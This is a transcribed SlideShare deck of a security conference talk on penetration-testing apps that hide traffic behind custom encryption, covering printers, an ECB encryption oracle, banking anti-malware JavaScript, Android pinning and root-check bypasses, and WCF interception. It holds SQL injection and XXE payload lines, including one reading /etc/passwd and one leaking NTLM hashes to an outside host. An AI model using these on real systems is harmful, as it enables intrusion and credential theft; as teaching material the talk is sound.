SlideShare a Scribd company logo

"We need to go deeper - testing inception apps" - Jakub Kałużny

PROIDEA
PROIDEA

When it comes to thick-clients, java applets, embedded devices or mobile apps - often, the idea is to forget about HTTP/S stack, plaintext POST parameters, and instead, implement a custom communication protocol. - Sending files for printing? Caesar cipher does not support full UTF-8, so use AES in ECB mode. - Malware attacking online banking? Even over HTTPS, double-encrypt POST parameters. If your clients are rich, use asymetric encryption, for better protection. - Planning SOAP WS? Use WCF Binary XML and put it in a START-TLS tunnel wrapped over a TCP connection. Welcome to the world of application/x-inception-data content types, <meta charset=obscure> encoding and custom cryptography. Ideas that usually implement methods of 'security by obscurity'. Once the outer layer of obfuscation is off, very often the server backend reveals simple access control issues, SQL query shells or code execution vulnerabilities. I will discuss real-world examples from enterprise solutions tests which require a bit more effort to allow tampering with data send from the client: - intercepting the traffic, bypassing NAC - decapsulating encryption and encoding layers - hooking into function calls, modifying packages - reverse-engineer proprietary protocols and encryption

Technology
1 of 78
Download to read offline
We need to go deeper Testing inception apps Jakub Kaluzny CONFidence, June 2019
DevSecOps B64: dXNlcm5hbWUK=YWRtaW4K&c GFzc3dvcmQK=YWJjCg%3d%3d HTTP username=admin&password=abc HTTP DAST scanner in CI/CD pipeline SQLi Is it fixed? Base64_decode(„YWJjCg==’ OR 1=1”)
JAKUB KALUZNY • 10 years in IT & Security • Threat modeling, DevSecOps, penetration tests • Poland, Spain, Australia • banking, fintech, law, airline, entertainment, e-commerce • Speaker at BlackHat, HackInTheBox, ZeroNights Who
What is this all about? HTTP username=admin&password=abc HTTP username=admin&password=abc SSL Wireshark
Protection against what? Sniffing, Man-in-The-Middle SQL Injection, cross-user access control, business logic
What is this all about? dXNlcm5hbWUK=YWRtaW4K&c GFzc3dvcmQK=YWJjCg%3d%3d HTTP username=admin&password=abc HTTP HTTP username=admin&password=abc SSL SSL Local HTTP proxy Custom script Wireshark
Inception apps AES encrypted: c6fa10bd98a6c4e778eac Binary protocol SSL Key exchange during activation Mobile app – obfuscated Emulator and root/jailbreak detection
• Raising the bar: • For attackers? • For testers? • Money: • Scoping a test? • Risk • Attack surface coverage? • Security level? Why?
• Technical examples • Business consequences • And discuss pentesting processes in general What
LET’S GET TO IT
Example 1 Enterprise printers – Pull Printing PRINTERWORKSTATION PRINT SERVER https://www.slideshare.net/wojdwo/hitb-kaluzny-final
In the middle of printers
Printers down under – AES
• JAR on the SD card • Encryption mechanism in the JAR • Hardcoded static symmetric key - AES Hidden gem – SD card
Example 1 – decompiled JAR
• JAR on the SD card • Encryption mechanism in the JAR • Hardcoded static symmetric key - AES • It’s the same everywhere! • No remote firmware update! Example 1
Attack flow Threat actor Crown jewels Sniff the communication Get the SD card Extract the key Apply decryption
In the middle of printers - revisited S E R V E R P R I N T E R constant 263B 96B, “X” B, 128B always different 64 B many identical 16B blocks HELLO HELLO, CERTIFICATE SESSION KEY PostScript, ECB mode
ECB encryption mode for PostScript files Each block encrypted separately ECB is bad https://en.wikipedia.org/wiki/ECB_mode
In the middle of printers - revisited S E R V E R P R I N T E R constant 263B 96B, “X” B, 128B always different 64 B many identical 16B blocks HELLO HELLO, CERTIFICATE SESSION KEY PostScript, ECB mode
Attack flow Threat actor Crown jewels Sniff the communication Communication analysis Decryption script Data extraction Access to plaintext files, no access control
MORE
Web app, AES comms, no key access HTTP Action=buy&Product=137&name=Kaluzny HTTP magic_string=abcdef1234567890… HTTP magic_string=abcdef1234567890… HTTP msg=Hi%20Kaluzny&Price_for_you=1500.50
b0dc782f6bd9acce9bc3e9c8317b0512 5bb51d9cbc4bfa56d41d7db1489f9bbc c2cc45f774773e48adde9c41ecd62c5b c1faafa1d2553661c8b83012f7e968d5 11b3215b7764e11fbff4c1db3aa73925 e479b31f1313d3c7bf78585f77f3f17d c69bb9650a3bfb6e9137e218c7267da6 a57fcd28cc90574b00374cc42f224dd3 Magic string magic_string=b0dc782f6bd9 acce9bc3e9c8317b05125bb51 d9cbc4bfa56d41d7db1489f9b bcc2cc45f774773e8adde9c41 ecd62c5bc1faafa1d2553661c 8b83012f7e968d511b3215b77 64e11fbff4c1db3aa7325e479 b31f1313d3c7bf78585f77f3f 17dc69bb9650a3bfb6e9137e2 18c7267da6a57fcd28cc9074b 00374cc42f224dd3 magic_string=b0dc782f6bd9 acce9bc3e9c8317bb6e9137e2 18c7267da6a57fcd28cc9074b 00374cc42f224dd3’ OR 1=1
b0dc782f6bd9acce9bc3e9c8317b0512 5bb51d9cbc4bfa56d41d7db1489f9bbc c2cc45f774773e48adde9c41ecd62c5b c1faafa1d2553661c8b83012f7e968d5 11b3215b7764e11fbff4c1db3aa73925 e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” c69bb9650a3bfb6e9137e218c7267da6 a57fcd28cc90574b00374cc42f224dd3 Magic string, name =Kaluznyaaaaaaaaaaaaaaa… Hi Kaluznyaaaaaaa aaaaaaaaaaaaaa aaaaaaaaaaaaaa aaaaaa, your price is 1500.50
b0dc782f6bd9acce9bc3e9c8317b0512 5bb51d9cbc4bfa56d41d7db1489f9bbc c2cc45f774773e48adde9c41ecd62c5b c1faafa1d2553661c8b83012f7e968d5 179762d5bba72ce4700aad2a96f5121d „Kaluznyaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” 5e8c96910f00f0c13fd5a402877d01ec „aaaaaaaaaaaaaaa&” a57fcd28cc90574b00374cc42f224dd3 Magic string, name =Kaluznyaaaaaaaaaaaaaaa… Hi Kaluznyaaaaaaa aaaaaaaaaaaaaa aaaaaaaaaaaaaa aaaaaa, your price is 1500.50
b0dc782f6bd9acce9bc3e9c8317b0512 5bb51d9cbc4bfa56d41d7db1489f9bbc c2cc45f774773e48adde9c41ecd62c5b c1faafa1d2553661c8b83012f7e968d5 e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” 179762d5bba72ce4700aad2a96f5121d „Kaluznyaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” 5e8c96910f00f0c13fd5a402877d01ec „aaaaaaaaaaaaaaa&” a57fcd28cc90574b00374cc42f224dd3 Magic string, name =Kaluznyaaaaaaaaaaaaaaa… Hi aaaaaaaaaaaaaa aKaluznyaaaaaa aaaaaaaaaaa, your price is 1500.50
b0dc782f6bd9acce9bc3e9c8317b0512 5bb51d9cbc4bfa56d41d7db1489f9bbc c2cc45f774773e48adde9c41ecd62c5b c1faafa1d2553661c8b83012f7e968d5 179762d5bba72ce4700aad2a96f5121d „Kaluznyaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” 5e8c96910f00f0c13fd5a402877d01ec „aaaaaaaaaaaaaaa&” a57fcd28cc90574b00374cc42f224dd3 Magic string, name =Kaluznyaaaaaaaaaaaaaaa…
b0dc782f6bd9acce9bc3e9c8317b0512 5bb51d9cbc4bfa56d41d7db1489f9bbc c2cc45f774773e48adde9c41ecd62c5b c1faafa1d2553661c8b83012f7e968d5 a3c87d6b3905a779a5f1023bdf04ad2a „aluznyaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” c69bb9650a3bfb6e9137e218c7267da6 „aaaaaaaaaaaaaa&i” a57fcd28cc90574b00374cc42f224dd3 Magic string, name =aluznyaaaaaaaaaaaaaaa…
b0dc782f6bd9acce9bc3e9c8317b0512 5bb51d9cbc4bfa56d41d7db1489f9bbc c2cc45f774773e48adde9c41ecd62c5b c1faafa1d2553661c8b83012f7e968d5 b1210bb98863ba5cd874014fb19fae70 „luznyaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” 6334547c4ba2df81296b72e38a5309d8 „aaaaaaaaaaaaa&ip” a57fcd28cc90574b00374cc42f224dd3 Magic string, name =luznyaaaaaaaaaaaaaaa…
b0dc782f6bd9acce9bc3e9c8317b0512 5bb51d9cbc4bfa56d41d7db1489f9bbc c2cc45f774773e48adde9c41ecd62c5b c1faafa1d2553661c8b83012f7e968d5 5abfcd17d58fe4136232bfd7a1533f93 „aaaaaaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” 880c5f38a4cfa7e003fe5f316294fe28 „aaaaa&ip=X.Y.Z.A” a57fcd28cc90574b00374cc42f224dd3 Magic string, name =aaaaaaaaaaaaaaa…
b0dc782f6bd9acce9bc3e9c8317b0512 5bb51d9cbc4bfa56d41d7db1489f9bbc c2cc45f774773e48adde9c41ecd62c5b c1faafa1d2553661c8b83012f7e968d5 5655d4c01446a7aeb104cf298fe6b613 „aaaaaaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” 1fa9f4fb1104af1afecd980bec3c8536 „&ip=X.Y.Z.A&user” a57fcd28cc90574b00374cc42f224dd3 Magic string, name =aaaaaaaaaaaaaa…
b0dc782f6bd9acce9bc3e9c8317b0512 5bb51d9cbc4bfa56d41d7db1489f9bbc c2cc45f774773e48adde9c41ecd62c5b c1faafa1d2553661c8b83012f7e968d5 179762d5bba72ce4700aad2a96f5121d „aaaaaaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” c69bb9650a3bfb6e9137e218c7267da6 „X.Y.Z.A&user=adm” a57fcd28cc90574b00374cc42f224dd3 Magic string, name =aaaaaaaaaaaaaaa…
b0dc782f6bd9acce9bc3e9c8317b0512 5bb51d9cbc4bfa56d41d7db1489f9bbc c2cc45f774773e48adde9c41ecd62c5b c1faafa1d2553661c8b83012f7e968d5 179762d5bba72ce4700aad2a96f5121d „aaaaaaaaaaaaaaaa” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” c69bb9650a3bfb6e9137e218c7267da6 „X.Y.Z.A&user=adm” e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa” c69bb9650a3bfb6e9137e218c7267da6 „X.Y.Z.A&user=adm” Encryption Oracle Hi Kaluznyaaaaaaa aaaaaaaaaaaaaa aaaaaaX.Y.Z.A, your price is 1500.50
B0dc782f6bd9acce9bc3e9c8317b0512 „action=buy&item” 5bb51d9cbc4bfa56d41d7db1489f9bbc „=137&price=1500” c2cc45f774773e48adde9c41ecd62c5b „.50&name=Kaluzn” c1faafa1d2553661c8b83012f7e968d5 „y&ip=X.Y.Z.A&us” 179762d5bba72ce4700aad2a96f5121d „er=admin&passwo” e479b31f1313d3c7bf78585f77f3f17d „rd=s3cr3t&path=” Encryption Oracle 031531894944dd25e457746a02f7eacf „&arbitrary=asd&&” 820cb29708da08d81cd8dd2ee1c459ed „chg=a&....&chg=b”
Web app, AES comms, no key access HTTP Action=buy&Product=137&name=Kaluzny HTTP magic_string=abcdef1234567890… HTTP magic_string=abcdef1234567890… HTTP msg=Hi%20Kaluzny&Price_for_you=1500.50 API
Attack flow Threat actor Crown jewels Tamper with parameters Communication analysis Encryption oracle Lateral movement Credentials would never be sent unencrypted
MITB MALWARE DETECTION IN JAVASCRIPT
MiTB malware - WebInjects <title>Bank</title> … Password: <input type=text> <script src=//malware> <title>Bank</title> … Password: <input type=text>
MiTB malware detection in JS <script src=//antimalware> <script src=//malware> <title>Bank</title> …
JS-based MiTB malware detection MiTB malware detection in JavaScript eval Obfuscation – base64, hex RSA encryption signatures reasoning engine Web Service rsa public key https://www.slideshare.net/wojdwo/bypassing-malware-detection-mechanisms-in-online-banking-confidence @molejarka, @j_kaluzny
Attack flow Threat actor Crown jewels Tamper with parameters Deobfuscate JS Extract RSA keys Decrypt communication
MiTB malware detection in JS <script src=//antimalware> <script src=//malware> <title>Bank</title> …
TESTING MOBILE BANKING IN 2019
Mobile banking in early 2010s OK Hi, I want to send $5 Standard SSL
Attack flow – Android – inception level 1 Threat actor Crown jewels Tamper with parameters Add local proxy CA
• Export CA from local proxy • Push it to the device • Intercept traffic Androd – inception level 1
Mobile banking in early 2010s OK Hi, I want to send $5 SSL pinning
Modifying a hardcoded certificate: • Unpack APK • Change certificate in resources • Pack the app, sign it Attack flow – inception level 2
Attack flow – inception level 2 Threat actor Crown jewels Tamper with parameters Bypass hardcoded SSL pinning checks Set the proxy
• Decompile APK to Smali code • „Void” the pinning methods or change the certificate: • Find the interesting methods • Delete the code, leaving „return-void” at the end • Build it, sign it Attack flow – inception level 2
Testing mobile banking in late 2010s, Poland 1c45a9eef01775077dac93add52595 OK, let’s set a key for future encryption Hi, I want to pair a mobile app e81129f01a5072bad84aaaf8bcc51436 SSL pinning HTTP body encryption
HTTP body encryption payload=e47bf2dcd90af0d3366f 4bacfe932ffae47bf2dcd90af0d33 SSL HTTP
Testing mobile banking in late 2010s, Poland 1c45a9eef01775077dac93add52595 OK, let’s set a key for future encryption Hi, I want to pair a mobile app e81129f01a5072bad84aaaf8bcc51436 SSL pinning Encrypted storage APK/IPA integrity Emulator detection Root/jb detection HTTP body encryption
Attack flow – Android – 7 layers of inception Threat actor Crown jewels Tamper with parameters Bypass integrity checks Bypass root detection Make encryption static Bypass SSL pinning Bypass emulator detection Develop Burp plugin
• Decompile APK to Smali code • „Void” the integrity checks Attack flow – Android – inception level 1/7
• Decompile APK to Smali code • „Void” the integrity checks • „Void” the root checks • Second root check runs a minute after the first! Attack flow – Android – inception level 2/7
• Decompile APK to Smali code • „Void” the integrity checks • „Void” the root checks • „Void” the emulator detection Attack flow – Android – inception level 3/7
• Decompile APK to Smali code • „Void” the integrity checks • „Void” the root checks • „Void” the emulator detection • Bypass SSL pinning Attack flow – Android – inception level 4/7
• Decompile APK to Smali code • „Void” the integrity checks • „Void” the root checks • „Void” the emulator detection • Bypass SSL pinning • Make encryption key „static” Attack flow – Android – inception level 5/7
Example 4 – mobile banking in 2019, Poland 1c45a9eef01775077dac93add52595 OK, let’s set a key for future encryption Hi, I want to pair a mobile app e81129f01a5072bad84aaaf8bcc51436 SSL pinning Encrypted storage APK/IPA integrity Emulator detection Root/jb detection HTTP body encryption
Example 4 – mobile banking in 2019, Poland 1c45a9eef01775077dac93add52595 The key will be 0000000000 Hi, I want to pair a mobile app e81129f01a5072bad84aaaf8bcc51436 SSL pinning Encrypted storage APK/IPA integrity Emulator detection Root/jb detection HTTP body encryption
• Decompile APK to Smali code • „Void” the integrity checks • „Void” the root checks • „Void” the emulator detection • Bypass SSL pinning • Make encryption key „static” • Develop a custom Burp plugin Attack flow – Android – inception level 6/7
Burp plugin – „Deszyfrator” @slawekja
Attack flow – Android – inception level 7/7 Threat actor Crown jewels Tamper with parameters Bypass integrity checks Bypass root detection Make encryption static Bypass SSL pinning Bypass emulator detection Develop Burp plugin You are in position to start testing
SOAP – Simple Object Access Protocol WCF BINARY XML - SOAP TCP START-TLS Let’s call it tnSOAP – totally not SOAP
mitm_relay for START-TLS [thick client] ----▶ [mitm_relay] ----▶ [destination server] | ▲ ▼ | [local proxy] < Intercept and | ▲ modify traffic here ▼ | [dummy webserver] https://github.com/jrmdev/mitm_relay
WCF data – python-wcfbin by ERNW [jk@omega python-wcfbin-develop]$ python xml2wcf.py | hexdump -Cv <?xml version="1.0"?> <soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:m="http://www.example.org"> <soap:Header> </soap:Header> <soap:Body> <m:GetStockPrice> <m:StockName>GOOG</m:StockName> </m:GetStockPrice> </soap:Body> </soap:Envelope> 00000000 43 04 73 6f 61 70 02 0b 04 73 6f 61 70 04 09 01 |C.soap...soap...| 00000010 6d 16 68 74 74 70 3a 2f 2f 77 77 77 2e 65 78 61 |m.http://www.exa| 00000020 6d 70 6c 65 2e 6f 72 67 43 04 73 6f 61 70 08 01 |mple.orgC.soap..| 00000030 43 04 73 6f 61 70 0e 6a 0d 47 65 74 53 74 6f 63 |C.soap.j.GetStoc| 00000040 6b 50 72 69 63 65 6a 09 53 74 6f 63 6b 4e 61 6d |kPricej.StockNam| 00000050 65 9f 03 18 e3 86 01 01 01 |e........| 00000059
Attack flow – tnSOAP Threat actor Crown jewels Tamper with parameters Intercept TCP connection MiTM on START-TLS Decapsulate WCF Hardware + socat mitm_relay python-wcfbin + few fixes
• <!ENTITY xxe SYSTEM „file:///etc/passwd”> • XXE OOB over FTP • <!ENTITY „abc” SYSTEM „file://securing.biz:445/”> TCP -> START TLS -> WCF -> XML -> XXE -> NTLM https://techblog.mediaservice.net/2018/02/from-xml-external-entity-to-ntlm-domain-hashes/
Attack flow – tnSOAP Threat actor Increased attack surface Tamper with parameters Intercept TCP connection MiTM on START-TLS Decapsulate WCF Hardware + socat mitm_relay python-wcfbin + few fixes
• Not a surprise that there are vulnerabilties • Let’s talk about corporate processes: • How penetration tests are organised? • During which phase you realise it’s an inception app? • What is the cost of implementing inception? • What is the security advantage of inception? • What is the cost of testing an inception app? • How to optimise it? Processes
Attack flow – Android – inception level 7/7 Threat actor Crown jewels Tamper with parameters Bypass integrity checks Bypass root detection Make encryption static Bypass SSL pinning Bypass emulator detection Develop Burp plugin You are in position to start testing
• Not a surprise that there are vulnerabilties • Let’s talk about corporate processes: • How penetration tests are organised? • During which phase you realise it’s an inception app? • What is the cost of implementing inception? • What is the security advantage of inception? • What is the cost of testing an inception app? • How to optimise it? Summary
Protection against what? Sniffing, Man-in-The-Middle, Malware SQL Injection, cross-user access control, business logic
• Not a surprise that there are vulnerabilties • Let’s talk about corporate processes: • How penetration tests are organised? • During which phase you realise it’s an inception app? • What is the cost of implementing inception? • What is the security advantage of inception? • What is the cost of testing an inception app? • How to optimise it? Summary
Thank you! Twitter: @j_kaluzny Jakub.Kaluzny@securing.biz MORE THAN SECURITY TESTS.

Recommended

"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz
PROIDEA
 
"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski
PROIDEA
 
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ..."Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
PROIDEA
 
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
PROIDEA
 
Da APK al Golden Ticket
Da APK al Golden TicketDa APK al Golden Ticket
Da APK al Golden Ticket
Giuseppe Trotta
 
Docker Plugin For DevSecOps
Docker Plugin For DevSecOpsDocker Plugin For DevSecOps
Docker Plugin For DevSecOps
Pichaya Morimoto
 
Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]
RootedCON
 
Writing malware while the blue team is staring at you
Writing malware while the blue team is staring at youWriting malware while the blue team is staring at you
Writing malware while the blue team is staring at you
Rob Fuller
 

Recommended

"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz
PROIDEA
 
"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski
PROIDEA
 
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ..."Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
PROIDEA
 
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
PROIDEA
 
Da APK al Golden Ticket
Da APK al Golden TicketDa APK al Golden Ticket
Da APK al Golden Ticket
Giuseppe Trotta
 
Docker Plugin For DevSecOps
Docker Plugin For DevSecOpsDocker Plugin For DevSecOps
Docker Plugin For DevSecOps
Pichaya Morimoto
 
Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]
RootedCON
 
Writing malware while the blue team is staring at you
Writing malware while the blue team is staring at youWriting malware while the blue team is staring at you
Writing malware while the blue team is staring at you
Rob Fuller
 
BlockChain implementation by python
BlockChain implementation by pythonBlockChain implementation by python
BlockChain implementation by python
wonyong hwang
 
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Rob Fuller
 
Kamailio and VoIP Wild World
Kamailio and VoIP Wild WorldKamailio and VoIP Wild World
Kamailio and VoIP Wild World
Daniel-Constantin Mierla
 
20190516 web security-basic
20190516 web security-basic20190516 web security-basic
20190516 web security-basic
MksYi
 
Pentesting an unfriendly environment: bypassing (un)common defences and mate ...
Pentesting an unfriendly environment: bypassing (un)common defences and mate ...Pentesting an unfriendly environment: bypassing (un)common defences and mate ...
Pentesting an unfriendly environment: bypassing (un)common defences and mate ...
Sandro Zaccarini
 
Passwords#14 - mimikatz
Passwords#14 - mimikatzPasswords#14 - mimikatz
Passwords#14 - mimikatz
Benjamin Delpy
 
Abusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itAbusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get it
Benjamin Delpy
 
Beyond PHP - it's not (just) about the code
Beyond PHP - it's not (just) about the codeBeyond PHP - it's not (just) about the code
Beyond PHP - it's not (just) about the code
Wim Godden
 
Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017
Manich Koomsusi
 
Thotcon0x9 Presentation: Climb the infosec skill tree by revisiting past CVEs
Thotcon0x9 Presentation: Climb the infosec skill tree by revisiting past CVEsThotcon0x9 Presentation: Climb the infosec skill tree by revisiting past CVEs
Thotcon0x9 Presentation: Climb the infosec skill tree by revisiting past CVEs
Sandra Escandor-O'Keefe
 
Угадываем пароль за минуту
Угадываем пароль за минутуУгадываем пароль за минуту
Угадываем пароль за минуту
Positive Hack Days
 
Wtf is happening_inside_my_android_phone_public
Wtf is happening_inside_my_android_phone_publicWtf is happening_inside_my_android_phone_public
Wtf is happening_inside_my_android_phone_public
Jaime Blasco
 
Logstash for SEO: come monitorare i Log del Web Server in realtime
Logstash for SEO: come monitorare i Log del Web Server in realtimeLogstash for SEO: come monitorare i Log del Web Server in realtime
Logstash for SEO: come monitorare i Log del Web Server in realtime
Andrea Cardinale
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya Morimoto
Pichaya Morimoto
 
Malcon2017
Malcon2017Malcon2017
Malcon2017
Andriy Brukhovetskyy
 
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environmentThreat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
Nahidul Kibria
 
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
RootedCON
 
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat Security Conference
 
JLeRN_CETIS2012
JLeRN_CETIS2012JLeRN_CETIS2012
JLeRN_CETIS2012
Bharti Gupta
 
Hiding in plain sight
Hiding in plain sightHiding in plain sight
Hiding in plain sight
Rob Gillen
 
Smit WiFi_2
Smit WiFi_2Smit WiFi_2
Smit WiFi_2
mutew
 
How to use shodan more powerful
How to use shodan more powerful How to use shodan more powerful
How to use shodan more powerful
National Cheng Kung University
 

More Related Content

What's hot

Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Rob Fuller
 
Thotcon0x9 Presentation: Climb the infosec skill tree by revisiting past CVEs
Thotcon0x9 Presentation: Climb the infosec skill tree by revisiting past CVEsThotcon0x9 Presentation: Climb the infosec skill tree by revisiting past CVEs
Thotcon0x9 Presentation: Climb the infosec skill tree by revisiting past CVEs
Sandra Escandor-O'Keefe
 
Угадываем пароль за минуту
Угадываем пароль за минутуУгадываем пароль за минуту
Угадываем пароль за минуту
Positive Hack Days
 
Wtf is happening_inside_my_android_phone_public
Wtf is happening_inside_my_android_phone_publicWtf is happening_inside_my_android_phone_public
Wtf is happening_inside_my_android_phone_public
Jaime Blasco
 
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
RootedCON
 
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery
BlueHat Security Conference
 

What's hot (20)

BlockChain implementation by python
BlockChain implementation by pythonBlockChain implementation by python
BlockChain implementation by python
 
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
 
Kamailio and VoIP Wild World
Kamailio and VoIP Wild WorldKamailio and VoIP Wild World
Kamailio and VoIP Wild World
 
20190516 web security-basic
20190516 web security-basic20190516 web security-basic
20190516 web security-basic
 
Pentesting an unfriendly environment: bypassing (un)common defences and mate ...
Pentesting an unfriendly environment: bypassing (un)common defences and mate ...Pentesting an unfriendly environment: bypassing (un)common defences and mate ...
Pentesting an unfriendly environment: bypassing (un)common defences and mate ...
 
Passwords#14 - mimikatz
Passwords#14 - mimikatzPasswords#14 - mimikatz
Passwords#14 - mimikatz
 
Abusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get itAbusing Microsoft Kerberos - Sorry you guys don't get it
Abusing Microsoft Kerberos - Sorry you guys don't get it
 
Beyond PHP - it's not (just) about the code
Beyond PHP - it's not (just) about the codeBeyond PHP - it's not (just) about the code
Beyond PHP - it's not (just) about the code
 
Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017Awesome_fuzzing_for _pentester_red-pill_2017
Awesome_fuzzing_for _pentester_red-pill_2017
 
Thotcon0x9 Presentation: Climb the infosec skill tree by revisiting past CVEs
Thotcon0x9 Presentation: Climb the infosec skill tree by revisiting past CVEsThotcon0x9 Presentation: Climb the infosec skill tree by revisiting past CVEs
Thotcon0x9 Presentation: Climb the infosec skill tree by revisiting past CVEs
 
Угадываем пароль за минуту
Угадываем пароль за минутуУгадываем пароль за минуту
Угадываем пароль за минуту
 
Wtf is happening_inside_my_android_phone_public
Wtf is happening_inside_my_android_phone_publicWtf is happening_inside_my_android_phone_public
Wtf is happening_inside_my_android_phone_public
 
Logstash for SEO: come monitorare i Log del Web Server in realtime
Logstash for SEO: come monitorare i Log del Web Server in realtimeLogstash for SEO: come monitorare i Log del Web Server in realtime
Logstash for SEO: come monitorare i Log del Web Server in realtime
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya Morimoto
 
Malcon2017
Malcon2017Malcon2017
Malcon2017
 
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
